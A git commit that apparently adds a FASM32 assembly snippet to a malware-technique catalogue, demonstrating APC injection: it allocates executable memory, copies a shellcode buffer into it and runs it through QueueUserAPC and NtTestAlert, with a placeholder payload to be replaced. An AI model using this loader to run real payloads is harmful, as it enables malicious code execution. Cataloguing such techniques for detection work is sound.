FASM32 Snippet: APC Injection

DarkCoderSc · DarkCoderSc · commit b181dffa298a · 2024-05-22T17:54:49.000+02:00
diff --git a/README.md b/README.md
@@ -73,3 +73,6 @@
 * Python
 	* [CodeCaveHelper](Unprotect/Python/CodeCaveHelper.py)
 	* [FindWindow](Unprotect/Python/FindWindow.py)
+
+ * FASM32
+	* [APC Injection](Unprotect/FASM/x32/apc_injection.asm)
diff --git a/Unprotect/FASM/x32/apc_injection.asm b/Unprotect/FASM/x32/apc_injection.asm
@@ -0,0 +1,74 @@
+format PE GUI 4.0
+entry main
+
+include 'win32w.inc'
+
+section '.code' readable executable
+
+; **************************************************
+; * Code
+main:
+        ; VirtualAlloc()
+        xor eax, eax                                   ; NULL
+        push PAGE_EXECUTE_READWRITE                    ; VirtualAlloc.flProtect
+        push MEM_COMMIT or MEM_RESERVE                 ; VirtualAlloc.flAllocationType
+        push [shellcode_length]                        ; VirtualAlloc.dwSize
+        push eax                                       ; VirtualAlloc.lpAddress
+        call [VirtualAlloc]
+        test eax, eax
+        jz exit
+
+        ; Copy Shellcode to Allocated Memory Region
+        mov edi, eax                                    ; Destination
+        mov esi, shellcode                              ; Source
+        mov ecx, [shellcode_length]                     ; Count
+        rep movsb                                       ; Copy
+        mov esi, eax                                    ; eax eq destination
+
+        ; GetCurrentThread()
+        call [GetCurrentThread]
+        mov ebx, eax
+
+        ; QueueUserAPC()
+        xor eax, eax
+        push eax                                        ; QueueUserAPC.dwData
+        push ebx                                        ; QueueUserAPC.hThread (Current Thread)
+        push esi                                        ; QueueUserAPC.pfnAPC (Copied Shellcode)
+        call [QueueUserAPC]
+        test eax, eax
+        jz exit
+
+        ; NtTestAlert()
+        call [NtTestAlert]
+exit:
+        ; ExitProcess()
+        xor eax, eax
+        inc eax                                         ; ExitCode = 1
+        push eax                                        ; ExitProcess.uExitCode
+        call [ExitProcess]
+
+
+; **************************************************
+; * Data
+section '.data' data readable
+
+; Replace with your own shellcode
+shellcode               db      0xcc, 0x90, 0x90, 0x90, 0x90
+
+shellcode_length        dd      $ - shellcode
+
+; **************************************************
+; * Imports
+section '.idata' import data readable
+
+library kernel32, 'KERNEL32.dll',\
+        ntdll, 'NTDLL.DLL'
+
+import kernel32,\
+       ExitProcess, 'ExitProcess',\
+       GetCurrentThread, 'GetCurrentThread',\
+       QueueUserAPC, 'QueueUserAPC',\
+       VirtualAlloc, 'VirtualAlloc'
+
+import ntdll,\
+       NtTestAlert, 'NtTestAlert'
